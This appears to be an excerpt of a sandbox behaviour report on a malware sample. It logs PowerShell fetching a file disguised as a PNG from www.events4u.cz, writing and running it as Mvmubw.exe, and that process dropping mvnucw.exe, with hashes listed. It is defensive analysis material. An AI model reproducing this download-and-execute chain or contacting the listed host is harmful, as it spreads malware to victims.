Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	3	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\profile.ps1, type = file_attributes	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn

Thread 0xa5c

(Host: 12, Network: 4)

Category	Operation	Information	Count	Logfile
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Inet	Close Session		1	Fn
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Module	Unmap	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe	1	Fn

Thread 0xa68

(Host: 76, Network: 58)

Category	Operation	Information	Count	Logfile
Environment	Get Environment String	name = MshEnableTrace	22	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_attributes	2	Fn
File	Create	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = file_type	2	Fn
File	Get Info	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, type = size, size_out = 0	1	Fn
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 1459	1	Fn Data
File	Read	filename = C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	2	Fn
File	Create	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, type = file_type	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion, value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Close	type = SOCK_DGRAM	1	Fn
System	Get Computer Name	result_out = AUFDDCNTXWT	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = Library, data = netfxperf.dll, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance, value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance, value_name = Counter Names, type = REG_BINARY	2	Fn Data
Module	Create Mapping	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
Module	Map	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE	1	Fn
System	Get Info	type = Operating System	2	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Open	mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	1	Fn
Mutex	Release	mutex_name = Global\.net clr networking	1	Fn
Mutex	Create	mutex_name = Global\.net clr networking	5	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Socket	Create	protocol = IPPROTO_TCP, address_family = AF_INET6, type = SOCK_STREAM	1	Fn
DNS	Resolve Name	host = www.events4u.cz, address_out = 93.185.102.11	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET, type = SOCK_DGRAM	1	Fn
Socket	Create	protocol = IPPROTO_IP, address_family = AF_INET6, type = SOCK_DGRAM	1	Fn
Socket	Connect	remote_address = 93.185.102.11, remote_port = 80	1	Fn
Socket	Close	type = SOCK_STREAM	1	Fn
Socket	Send	flags = NO_FLAG_SET, size = 74, size_out = 74	1	Fn Data
Inet	Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Inet	Open Connection	protocol = http, server_name = www.events4u.cz, server_port = 80	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /kas23.png	1	Fn
Inet	Send HTTP Request	headers = host: www.events4u.cz, connection: Keep-Alive, url = www.events4u.cz/kas23.png	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 4096, size_out = 4096	1	Fn Data
Inet	Read Response	size = 4096, size_out = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 65536	1	Fn Data
Inet	Read Response	size = 65536, size_out = 65536	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 65198	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 8776	1	Fn Data
Inet	Read Response	size = 65536, size_out = 8776	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 8776	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 56628	1	Fn Data
Inet	Read Response	size = 65536, size_out = 56628	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 56628	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 4356	1	Fn Data
Inet	Read Response	size = 65536, size_out = 4356	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4356	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 4356	1	Fn Data
Inet	Read Response	size = 65536, size_out = 4356	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4356	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 4356	1	Fn Data
Inet	Read Response	size = 65536, size_out = 4356	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4356	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 1452	1	Fn Data
Inet	Read Response	size = 65536, size_out = 1452	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 65536	1	Fn Data
Inet	Read Response	size = 65536, size_out = 65536	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 62892	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 8516	1	Fn Data
Inet	Read Response	size = 65536, size_out = 8516	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 8516	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3472	1	Fn Data
Inet	Read Response	size = 65536, size_out = 3472	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 884	1	Fn Data
Inet	Read Response	size = 65536, size_out = 884	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 56628	1	Fn Data
Inet	Read Response	size = 65536, size_out = 56628	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 52792	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 63888	1	Fn Data
Inet	Read Response	size = 65536, size_out = 63888	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 63888	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 29040	1	Fn Data
Inet	Read Response	size = 65536, size_out = 29040	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 29040	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3472	1	Fn Data
Inet	Read Response	size = 65536, size_out = 3472	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3788	1	Fn Data
Inet	Read Response	size = 65536, size_out = 3788	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4096	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 65536, size_out = 59532	1	Fn Data
Inet	Read Response	size = 65536, size_out = 59532	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 58600	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 39354, size_out = 5808	1	Fn Data
Inet	Read Response	size = 39354, size_out = 5808	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 5808	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 33546, size_out = 1452	1	Fn Data
Inet	Read Response	size = 33546, size_out = 1452	1	Fn Data
Socket	Receive	flags = NO_FLAG_SET, size = 32094, size_out = 32094	1	Fn Data
Inet	Read Response	size = 32094, size_out = 32094	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 4096	1	Fn Data
File	Write	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, size = 29450	1	Fn Data
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\AppData\Local\Temp\Mvmubw.exe, type = file_attributes	3	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
File	Get Info	filename = C:\Users\aDU0VK IWA5kLS\Desktop, type = file_attributes	2	Fn
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn

Thread 0xb14

(Host: 1, Network: 0)

Category	Operation	Information	Success	Count	Logfile
Process	Create	process_name = C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe, show_window = SW_SHOWNORMAL		1	Fn

Process #6: mvmubw.exe

(Host: 43, Network: 0)

Information	Value
ID	#6
File Name	c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe
Command Line	"C:\Users\ADU0VK~1\AppData\Local\Temp\Mvmubw.exe"
Initial Working Directory	C:\Users\aDU0VK IWA5kLS\Desktop\
Monitor	Start Time: 00:01:25, Reason: Child Process
Unmonitor	End Time: 00:02:26, Reason: Terminated by Timeout
Monitor Duration	00:01:01

OS Process Information

Information	Value
PID	0xb18
Parent PID	0xa40 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	AUFDDCNTXWT\aDU0VK IWA5kLS
Groups	AUFDDCNTXWT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:000103d4 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B1C

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x001b0000	0x00216fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000220000	0x00220000	0x00220fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
pagefile_0x0000000000230000	0x00230000	0x00230fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000280000	0x00280000	0x002fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000300000	0x00300000	0x0036ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000370000	0x00370000	0x003effff	Private Memory	Readable, Writable	Region Actions Download Dump
mvmubw.exe	0x00400000	0x00475fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000400000	0x00400000	0x00441fff	Private Memory		Region Actions Download Dump
private_0x0000000000550000	0x00550000	0x0064ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000650000	0x00650000	0x007d7fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000800000	0x00800000	0x0080ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000810000	0x00810000	0x00990fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000009a0000	0x009a0000	0x01d9ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001da0000	0x01da0000	0x01e7efff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01e80000	0x0214efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002150000	0x02150000	0x0227efff	Private Memory	Readable, Writable	Region Actions Download Dump
dwmapi.dll	0x73600000	0x73612fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73a80000	0x73afffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x73c40000	0x73c9bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73ca0000	0x73cdefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x73d10000	0x73d17fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75270000	0x7527bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75280000	0x752dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x752e0000	0x7543bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75440000	0x7552ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x757e0000	0x758dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x75970000	0x75988fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x75ab0000	0x75b3ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x75bc0000	0x75c8bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75d10000	0x75dbbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75dc0000	0x75ecffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x75fe0000	0x76c29fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76f10000	0x76f66fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76f80000	0x76fdffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x76fe0000	0x76fe9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x77130000	0x77175fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x77180000	0x7721cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77280000	0x7731ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000077320000	0x77320000	0x7743efff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000077440000	0x77440000	0x77539fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x77540000	0x776e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77720000	0x7789ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	472.00 KB (483328 bytes)	MD5: 0ebfd6e45dea48c7f54b5574d69da458 SHA1: 11ad0fae8318bc72e1525c161c5df72a9da9430b SHA256: 3ba1b55c3268529b586e154b9117d25ae6c3667a2e869747c51bd88fd2a7a581		File Actions Show Properties Download
c:\users\adu0vk iwa5kls\appdata\roaming\winapp\mvnucw.exe	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855		File Actions Show Properties

Threads

Thread 0xb1c

(Host: 42, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe, base_address = 0x400000	2	Fn
Window	Create	window_name = msPin, class_name = cmsPin, wndproc_parameter = 0	1	Fn
Window	Create	window_name = @, class_name = button, wndproc_parameter = 0	1	Fn
Window	Create	window_name = @, class_name = STATIC, wndproc_parameter = 0	1	Fn
Window	Create	class_name = richedit, wndproc_parameter = 0	1	Fn
Window	Create	class_name = EDIT, wndproc_parameter = 0	1	Fn
Module	Get Handle	module_name = c:\users\adu0vk~1\appdata\local\temp\mvmubw.exe, base_address = 0x400000	1	Fn
File	Create	filename = C:\Users\aDU0VK IWA5kLS\Desktop, desired_access = GENERIC_READ	1	Fn
Module	Load	module_name = Kernel32.dll, base_address = 0x75dc0000	1	Fn
